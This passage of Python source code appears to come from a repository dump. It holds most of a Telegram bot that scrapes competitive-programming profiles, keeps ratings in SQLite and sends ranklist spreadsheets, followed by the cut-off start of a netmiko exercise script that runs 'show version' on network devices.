"class": "dl-horizontal profile-info-data profile-info-data-stats"}).text.replace("\t",
"").replace(
"\xa0", "").strip('\n')
sp = s
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif wo == 5 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://codeforces.com/profile/' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).text
s = soup.find_all('span', {"style": "font-weight:bold;"})
if len(s) == 0:
s2 = ""
else:
s2 = "contest rating: " + s[0].text + "\n" + "max: " + s[1].text + s[2].text + "\n"
s1 = "CODEFORCES\n" + s2 + "contributions: " + soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).nextSibling.nextSibling.text
cf = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
if not he=='' or (he=='' and (row[1] == '' or row[1] is None)):
c.execute("UPDATE datas SET HE=(?) WHERE id=(?)",(he,str(a)))
try:
rat = he.split('\n')
if (rat[1] == "Rating"):
rat2 = rat[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET HE = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not hr == '' or (hr=='' and (row[2] == '' or row[2] is None)):
c.execute("UPDATE datas SET HR=(?) WHERE id=(?)", (hr,str(a)))
try:
rat = hr.split('\n')
rat2 = rat[1].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET HR = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not cf == '' or (cf=='' and (row[5] == '' or row[5] is None)):
c.execute("UPDATE datas SET CF=(?) WHERE id=(?)", (cf,str(a)))
try:
rat = cf.split("\n")
if "contest rating:" in rat[1]:
rat2 = rat[1].split(" ")[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET CF = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not cc == '' or (cc=='' and (row[3] == '' or row[3] is None)):
c.execute("UPDATE datas SET CC=(?) WHERE id=(?)", (cc,str(a)))
try:
rat = cc.split("\n")
if not "rating" in rat[1]:
rat2 = rat[2].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET CC = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not sp=='' or (sp=='' and (row[4] == '' or row[4] is None)):
c.execute("UPDATE datas SET SP=(?) WHERE id=(?)", (sp,str(a)))
# RECREATING ALL XLSX FILES
workbook = Workbook(mount_point + "HE.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HE FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "HR.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HR FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.HR AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "SP.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT name, SP FROM datas")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "CF.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.CF FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point + "CC.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CC AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.delete_message(chat_id=query.message.chat_id, message_id=query.message.message_id)
else:
# ELSE ONLY UPDATING THE PARTICULAR ENTRY
c.execute("SELECT " + val + " FROM handles WHERE id=(?)", (a,))
for row in c.fetchall():
if row[0] == "" or row[0] is None:
bot.edit_message_text(text='You are not registered to the bot with' + val,
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.close()
return ConversationHandler.END
else:
print(row[0])
if val == "HE":
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerearth.com/@' + str(row[0]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
stri = "HACKEREARTH\n"
for i in soup.find_all('a', {
"href": "/users/" + str(row[0]) + "/activity/hackerearth/#user-rating-graph"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[0]) + "/followers/"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[0]) + "/following/"}):
stri = stri + i.text + "\n"
ans = stri
except urllib.error.URLError as e:
pass
elif val == 'HR':
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerrank.com/' + str(row[0]) + '?hr_r=1')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('script', {"id": "initialData"}).text
s = soup.find('script', {"id": "initialData"}).text
i = s.find("hacker_id", s.find("hacker_id", s.find("hacker_id") + 1) + 1)
i = parse.unquote(s[i:i + 280]).replace(",", ">").replace(":", " ").replace("{",
"").replace(
"}",
"").replace(
'"', "").split(">")
s1 = "HACKERRANK\n"
for j in range(1, 10):
s1 = s1 + i[j] + "\n"
ans = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif val == "CC":
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
count=0
while(count<5):
try:
sauce = opener.open('https://www.codechef.com/users/' + str(row[0]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('a', {"href": "http://www.codechef.com/ratings/all"}).text
try:
s1 = soup.find('span', {"class": "rating"}).text + "\n"
except AttributeError:
s1 = ""
s = "CODECHEF" + "\n" + s1 + "rating: " + soup.find('a', {
"href": "http://www.codechef.com/ratings/all"}).text + "\n" + soup.find('div', {
"class": "rating-ranks"}).text.replace(" ", "").replace("\n\n", "").strip('\n')
ans = s
break
except AttributeError:
break
except urllib.error.URLError as e:
count=count+1
continue
elif val == "SP":
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://www.spoj.com/users/' + str(row[0]) + '/')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('div', {"class": "col-md-3"}).text
s = soup.find('div', {"class": "col-md-3"}).text.strip('\n\n').replace("\t", "").split('\n')
s = s[3].strip().split(":")
s = "SPOJ\n" + s[0] + "\n" + s[1].strip(" ") + "\n" + soup.find('dl', {
"class": "dl-horizontal profile-info-data profile-info-data-stats"}).text.replace("\t",
"").replace(
"\xa0", "").strip('\n')
ans = s
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif val == "CF":
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://codeforces.com/profile/' + str(row[0]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).text
s = soup.find_all('span', {"style": "font-weight:bold;"})
if len(s) == 0:
s2 = ""
else:
s2 = "contest rating: " + s[0].text + "\n" + "max: " + s[1].text + s[2].text + "\n"
s1 = "CODEFORCES\n" + s2 + "contributions: " + soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).nextSibling.nextSibling.text
ans = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
c.execute("UPDATE datas SET " + val + " = (?) WHERE id = (?) ", (ans, a))
if val == 'HE':
try:
rat = ans.split('\n')
if (rat[1] == "Rating"):
rat2 = rat[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET HE = (?) WHERE id = (?) ", (rat2, a))
except:
pass
elif val == 'HR':
try:
rat = ans.split('\n')
rat2 = rat[1].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET HR = (?) WHERE id = (?) ", (rat2, a))
except:
pass
elif val == 'CF':
try:
rat = ans.split("\n")
if "contest rating:" in rat[1]:
rat2 = rat[1].split(" ")[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET CF = (?) WHERE id = (?) ", (rat2, a))
except:
pass
elif val == 'CC':
try:
rat = ans.split("\n")
if not "rating" in rat[1]:
rat2 = rat[2].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET CC = (?) WHERE id = (?) ", (rat2, a))
except:
pass
bot.edit_message_text(text=""+ans, chat_id=query.message.chat_id, message_id=query.message.message_id)
# RECREATING ALL THE XLMX FILES
workbook = Workbook(mount_point + val + ".xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
if not val=="SP":
mysel = c.execute(
"SELECT datas.name, datas." + val + " FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority." + val + " AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
else:
mysel = c.execute(
"SELECT name, " + val + " FROM datas")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point+'all.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HE, datas.HR, datas.SP, datas.CF, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC, CAST(priority.CC AS FLOAT) DESC, CAST(priority.HR AS FLOAT) DESC, CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.send_message(text='Successfully updated',
chat_id=query.message.chat_id)
conn.commit()
conn.close()
return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR UPDATING USERS DATA ON HIS WISH
# START OF CONVERSATION HANDLER TO GET THE RANKLIST
@timeouts.wrapper
def ranklist(bot, update):
keyboard = [[InlineKeyboardButton("EVERY ONE", callback_data='allsel1'),
InlineKeyboardButton("MINE", callback_data='minesel1')],
[InlineKeyboardButton("GET BY NAME", callback_data='getNamesel1')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("Please select the ranklist you want", reply_markup=reply_markup)
return SELECTION
# FUNCTION TO GET THE USER REQUEST AND SHOW MENU OF RANKLISTS
def selection(bot, update):
query = update.callback_query
val = query.data
val=str(val).replace("sel1","")
if val == "all":
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HElist6'),
InlineKeyboardButton("Hackerrank", callback_data='HRlist6')],
[InlineKeyboardButton("Codechef", callback_data='CClist6'),
InlineKeyboardButton("Spoj", callback_data='SPlist6')],
[InlineKeyboardButton("Codeforces", callback_data='CFlist6'),
InlineKeyboardButton("ALL", callback_data='ALLlist6')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(text='please select the judge or select all for showing all', reply_markup=reply_markup,
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return HOLO
elif val == "mine":
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
print(str(query.from_user.id))
c.execute("SELECT id FROM datas WHERE id=" + str(query.from_user.id))
if c.fetchone():
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HElist7'),
InlineKeyboardButton("Hackerrank", callback_data='HRlist7')],
[InlineKeyboardButton("Codechef", callback_data='CClist7'),
InlineKeyboardButton("Spoj", callback_data='SPlist7')],
[InlineKeyboardButton("Codeforces", callback_data='CFlist7'),
InlineKeyboardButton("ALL", callback_data='ALLlist7')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(text='please select the judge or select all for showing all',
reply_markup=reply_markup,
chat_id=query.message.chat_id,
message_id=query.message.message_id)
c.close()
return SOLO
else:
conn.close()
bot.edit_message_text(
text='You are not registered to the bot. please register to it using /register command',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return ConversationHandler.END
elif val == "getName":
bot.edit_message_text(text='please enter the name',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return POLO
else:
return ConversationHandler.END
# FUNCTION TO GET THE USERS RANKLIST
def solo(bot, update):
query = update.callback_query
val = query.data
choices = ['HElist7', 'HRlist7', 'CClist7', 'SPlist7', 'CFlist7', 'ALLlist7']
if val not in choices:
return ConversationHandler.END
val=str(val).replace("list7","")
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
if val == "ALL":
a = str(query.from_user.id)
c.execute("SELECT name, HE, HR, SP, CC, CF FROM datas WHERE id=" + a)
bot.edit_message_text(text='Sending please wait',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
workbook = Workbook('me.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT name, HE, HR, SP, CC, CF FROM datas WHERE id=" + a)
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.send_document(chat_id=query.message.chat_id, document=open('me.xlsx', 'rb'))
os.remove('me.xlsx')
else:
a = str(query.from_user.id)
c.execute("SELECT " + val + " FROM datas WHERE id=" + a)
for i in c.fetchall():
if i[0] is None or i[0] == "":
bot.edit_message_text(text="NOT REGISTERED",
chat_id=query.message.chat_id,
message_id=query.message.message_id)
else:
bot.edit_message_text(text="" + i[0],
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.commit()
conn.close()
return ConversationHandler.END
# FUNCTION TO GET THE RANKLIST MENU OF THE USER BY SEARCHING IS NAME
def polo(bot, update, user_data):
msg = update.message.text.upper()
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute("SELECT name FROM handles WHERE name=(?)", (msg,))
if c.fetchone():
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HElist8'),
InlineKeyboardButton("Hackerrank", callback_data='HRlist8')],
[InlineKeyboardButton("Codechef", callback_data='CClist8'),
InlineKeyboardButton("Spoj", callback_data='SPlist8')],
[InlineKeyboardButton("Codeforces", callback_data='CFlist8'),
InlineKeyboardButton("ALL", callback_data='ALLlist8')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text('please select the judge or select all for showing all', reply_markup=reply_markup)
user_data['name1'] = msg
conn.close()
return XOLO
else:
conn.close()
update.message.reply_text("Sorry this name not found")
return ConversationHandler.END
# FUNCTION TO SHOW THE KIND OF RANKLIST USER WANTS
def xolo(bot, update, user_data):
query = update.callback_query
val = query.data
choices = ['HElist8', 'HRlist8', 'CClist8', 'SPlist8', 'CFlist8', 'ALLlist8']
if val not in choices:
return ConversationHandler.END
val=str(val).replace("list8","")
name1 = user_data['name1']
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
if val == "ALL":
c.execute("SELECT name, HE, HR, SP, CC, CF FROM datas WHERE name=(?)", (name1,))
bot.edit_message_text(text='Sending please wait',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
workbook = Workbook('det.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT name, HE, HR, SP, CC, CF FROM datas WHERE name=(?)", (name1,))
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.send_document(chat_id=query.message.chat_id, document=open('det.xlsx', 'rb'))
os.remove('det.xlsx')
else:
c.execute("SELECT " + val + " FROM datas WHERE name=(?)", (name1,))
for i in c.fetchall():
if i[0] is None or i[0] == "":
bot.edit_message_text(text="Not Registered",
chat_id=query.message.chat_id,
message_id=query.message.message_id)
else:
bot.edit_message_text(text="" + i[0],
chat_id=query.message.chat_id,
message_id=query.message.message_id)
user_data.clear()
conn.close()
return ConversationHandler.END
# FUNCTION TO SHOW THE RANKLIST OF ALL THE PEOPLE
def holo(bot, update):
query = update.callback_query
val = query.data
choices = ['HElist6', 'HRlist6', 'CClist6', 'SPlist6', 'CFlist6', 'ALLlist6']
if val not in choices:
return ConversationHandler.END
val = str(val).replace("list6", "")
if val == "ALL":
try:
bot.edit_message_text(text='I am sending you the details',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
bot.send_document(chat_id=query.message.chat_id, document=open(mount_point+'all.xlsx', 'rb'))
except FileNotFoundError:
bot.edit_message_text(text='Sorry no entry found',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return ConversationHandler.END
else:
try:
bot.edit_message_text(text='I am sending you the details',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
bot.send_document(chat_id=query.message.chat_id, document=open(mount_point + val + ".xlsx", 'rb'))
except FileNotFoundError:
bot.edit_message_text(text='Sorry no entry found',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return ConversationHandler.END
return ConversationHandler.END
# END OF CONVERSATION HANDLER TO GET THE RANKLIST
# COMMAND HANDLER FUNCTION FOR CANCELLING
def cancel(bot, update, user_data):
update.message.reply_text('Cancelled')
user_data.clear()
return ConversationHandler.END
# START OF ADMIN COMMANDS
# ADMIN COMMAND HANDLER FUNCTION TO RUN UPDATE WHEN HE WANTS
@timeouts.wrapper
def adminupdate(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
updaters()
@timeouts.wrapper
def restart(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
bot.send_message(update.message.chat_id, "Bot is restarting...")
time.sleep(0.2)
os.execl(sys.executable, sys.executable, *sys.argv)
# ADMIN COMMAND HANDLER FUNCTION TO UPDATE ALL THE QUESTIONS WHEN HE WANTS
@timeouts.wrapper
def admqupd(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
qupd()
updateCf()
# START OF ADMIN CONVERSATION HANDLER TO REPLACE THE DATABASE
@timeouts.wrapper
def getDb(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return ConversationHandler.END
update.message.reply_text("send your sqlite database")
return DB
def db(bot, update):
file_id = update.message.document.file_id
newFile = bot.get_file(file_id)
newFile.download(mount_point+'coders1.db')
update.message.reply_text("saved")
return ConversationHandler.END
# END OF ADMIN CONVERSATION HANDLER TO REPLACE THE DATABASE
# START OF ADMIN CONVERSATION HANDLER TO REPLACE THE CODEFORCES JSON
@timeouts.wrapper
def getCf(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return ConversationHandler.END
update.message.reply_text("send your json file")
return CF
def cf(bot, update):
global qcf
file_id = update.message.document.file_id
newFile = bot.get_file(file_id)
newFile.download(mount_point+'codeforces.json')
update.message.reply_text("saved")
with open(mount_point+'codeforces.json','r') as codeforces:
qcf=json.load(codeforces)
return ConversationHandler.END
# END OF ADMIN CONVERSATION HANDLER TO REPLACE THE CODEFORCES JSON
# ADMIN COMMAND HANDLER FOR GETTING THE DATABASE
@timeouts.wrapper
def givememydb(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
bot.send_document(chat_id=update.message.chat_id, document=open(mount_point+'coders1.db', 'rb'))
# ADMIN COMMAND HANDLER FOR GETTING THE CODEFORCES JSON
@timeouts.wrapper
def getcfjson(bot,update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
bot.send_document(chat_id=update.message.chat_id, document=open(mount_point+'codeforces.json', 'rb'))
# ADMIN COMMAND HANDLER FUNCTION TO GET THE DETAILS OF HANDLES OF ALL THE USERS IN DATABASE
@timeouts.wrapper
def adminhandle(bot, update):
if not str(update.message.chat_id) in adminlist:
update.message.reply_text("sorry you are not an admin")
return
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute('SELECT * FROM handles')
workbook = Workbook("admin.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT * FROM handles")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
workbook.close()
bot.send_document(chat_id=update.message.chat_id, document=open('admin.xlsx', 'rb'))
os.remove('admin.xlsx')
conn.close()
# END OF ADMIN COMMANDS
# MAIN SETUP FUNCTION
def setup(webhook_url=None):
"""If webhook_url is not passed, run with long-polling."""
logging.basicConfig(level=logging.WARNING)
if webhook_url:
bot = Bot(TOKEN)
update_queue = Queue()
dp = Dispatcher(bot, update_queue)
else:
updater = Updater(TOKEN)
bot = updater.bot
dp = updater.dispatcher
# CONVERSATION HANDLER FOR REGISTERING
conv_handler = ConversationHandler(
entry_points=[CommandHandler('register', register)],
allow_reentry=True,
states={
NAME: [MessageHandler(Filters.text, name, pass_user_data=True)],
JUDGE: [CallbackQueryHandler(judge, pass_user_data=True,pattern=r'\w*reg1\b')],
HANDLE: [MessageHandler(Filters.text, handle, pass_user_data=True)]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GETTING RANKLIST
conv_handler1 = ConversationHandler(
entry_points=[CommandHandler('ranklist', ranklist)],
allow_reentry=True,
states={
SELECTION: [CallbackQueryHandler(selection,pattern=r'\w*sel1\b')],
HOLO: [CallbackQueryHandler(holo,pattern=r'\w*list6\b')],
SOLO: [CallbackQueryHandler(solo,pattern=r'\w*list7\b')],
POLO: [MessageHandler(Filters.text, polo, pass_user_data=True)],
XOLO: [CallbackQueryHandler(xolo, pass_user_data=True,pattern=r'\w*list8\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR UNREGISTERING
conv_handler2 = ConversationHandler(
entry_points=[CommandHandler('unregister', unregister)],
allow_reentry=True,
states={
REMOVER: [CallbackQueryHandler(remover,pattern=r'\w*rem2\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR UPDATING
conv_handler3 = ConversationHandler(
entry_points=[CommandHandler('update', updatesel)],
allow_reentry=True,
states={
UPDA: [CallbackQueryHandler(updasel,pattern=r'\w*upd5\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR COMPILING AND RUNNING
conv_handler4 = ConversationHandler(
entry_points=[CommandHandler('compiler', compilers)],
allow_reentry=True,
states={
LANG: [CallbackQueryHandler(lang, pass_user_data=True,pattern=r'\w*comp1\b')],
CODE: [CallbackQueryHandler(code, pass_user_data=True,pattern=r'\w*so1\b')],
DECODE: [MessageHandler(Filters.text, decode, pass_user_data=True)],
TESTCASES: [MessageHandler(Filters.text, testcases, pass_user_data=True)],
OTHER: [MessageHandler(Filters.text, other, pass_user_data=True)],
FILE: [MessageHandler(Filters.document, filer, pass_user_data=True)],
FILETEST: [MessageHandler(Filters.document, filetest, pass_user_data=True)]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GETTING A RANDOM QUESTION FROM CODECHEF
conv_handler5 = ConversationHandler(
entry_points=[CommandHandler('randomcc', randomcc)],
allow_reentry=True,
states={
QSELCC: [CallbackQueryHandler(qselcc,pattern=r'\w*cc1\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GEEKS FOR GEEKS
conv_handler6 = ConversationHandler(
entry_points=[CommandHandler('geeksforgeeks', gfg)],
allow_reentry=True,
states={
GFG1: [CallbackQueryHandler(gfg1, pass_user_data=True,pattern=r'\w*gfg1\b')],
GFG2: [CallbackQueryHandler(gfg2, pass_user_data=True,pattern='^.*gfg2.*$')],
GFG3: [CallbackQueryHandler(gfg3, pass_user_data=True,pattern='^.*gfg3.*$')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR REPLACING SQLITE DATABASE
conv_handler7 = ConversationHandler(
entry_points=[CommandHandler('senddb', getDb)],
allow_reentry=True,
states={
DB: [MessageHandler(Filters.document, db)]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GETTING UPCOMING COMPETITIONS
conv_handler8 = ConversationHandler(
entry_points=[CommandHandler('upcoming', upcoming)],
allow_reentry=True,
states={
SCHED: [CallbackQueryHandler(remind,pattern=r"^[0-9]*$")]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR REMOVING CONTEST REMINDERS
conv_handler9 = ConversationHandler(
entry_points=[CommandHandler('dontRemindMe', removeRemind)],
allow_reentry=True,
states={
REMNOTI: [CallbackQueryHandler(remnoti,pattern=r'^.*notiplz.*$')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER FOR GETTING RANDOM QUESTION FROM CODEFORCES
conv_handler10 = ConversationHandler(
entry_points=[CommandHandler('randomcf', randomcf)],
allow_reentry=True,
states={
QSELCF: [CallbackQueryHandler(qselcf,pattern=r'\w*cf1\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# ADMIN CONVERSATION HANDLER TO REPLACE CODEFORCES JSON FILE
conv_handler11 = ConversationHandler(
entry_points=[CommandHandler('sendcf', getCf)],
allow_reentry=True,
states={
CF: [MessageHandler(Filters.document,cf)]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER TO SUBSCRIBE TO QUESTION OF THE DAY
conv_handler12 = ConversationHandler(
entry_points=[CommandHandler('subscribe', subscribe)],
allow_reentry=True,
states={
SUBSEL:[CallbackQueryHandler(subsel,pattern=r'\w*sub3\b')],
SUBCC:[CallbackQueryHandler(subcc,pattern=r'\w*cc2\b')],
SUBCF: [CallbackQueryHandler(subcf,pattern=r'\w*cf2\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
# CONVERSATION HANDLER TO UNSUBSCRIBE FROM QUESTION OF THE DAY
conv_handler13 = ConversationHandler(
entry_points=[CommandHandler('unsubscribe', unsubsel)],
allow_reentry=True,
states={
UNSUB: [CallbackQueryHandler(unsub,pattern=r'\w*unsub4\b')]
},
fallbacks=[CommandHandler('cancel', cancel, pass_user_data=True)]
)
dp.add_handler(conv_handler)
dp.add_handler(conv_handler1)
dp.add_handler(conv_handler2)
dp.add_handler(conv_handler3)
dp.add_handler(conv_handler4)
dp.add_handler(conv_handler5)
dp.add_handler(conv_handler6)
dp.add_handler(conv_handler7)
dp.add_handler(conv_handler8)
dp.add_handler(conv_handler9)
dp.add_handler(conv_handler10)
dp.add_handler(conv_handler11)
dp.add_handler(conv_handler12)
dp.add_handler(conv_handler13)
dp.add_handler(CommandHandler('help', help))
dp.add_handler(CommandHandler('givememydb', givememydb))
dp.add_handler(CommandHandler('getcfjson', getcfjson))
dp.add_handler(CommandHandler('start', start))
dp.add_handler(CommandHandler('ongoing', ongoing))
dp.add_handler(CommandHandler('adminhandle', adminhandle))
dp.add_handler(CommandHandler('adminud', adminupdate))
dp.add_handler(CommandHandler('adminuq', admqupd))
dp.add_handler(CommandHandler('adminrestart', restart))
# log all errors
dp.add_error_handler(error)
if webhook_url:
bot.set_webhook(webhook_url=webhook_url)
thread = Thread(target=dp.start, name='dispatcher')
thread.start()
return update_queue, bot
else:
bot.set_webhook() # Delete webhook
updater.start_polling()
updater.idle()
if __name__ == '__main__':
setup() |
exercise8.py | #!/usr/bin/env python
'''
Exercise 8 - Class 8 - Thread connection to each device and run the command
Gleydson Mazioli <gleydsonmazioli@gmail.com>
'''
from net_system.models import NetworkDevice
import netmiko
import django
import time
from multiprocessing import Process, Queue
def get_cred_type(l_credentials, l_type):
    '''
    Return the first credential whose description contains l_type.

    The description match is case-insensitive. None is returned when no
    credential matches (same as the implicit fall-through return).
    '''
    matches = (c for c in l_credentials if l_type in c.description.lower())
    return next(matches, None)
def run_command(device, queue):
    '''
    Connect to one network device over SSH and collect "show version".

    The output is framed by a banner of '*' characters, keyed by the
    device name, and pushed onto the shared queue for the parent process.

    device -- NetworkDevice model instance (address, port, credentials)
    queue  -- multiprocessing.Queue used to hand the result back

    Returns 1 on missing credentials or authentication failure,
    otherwise returns None after queueing the output.
    '''
    device_type = device.device_type
    port = device.port
    secret = ''
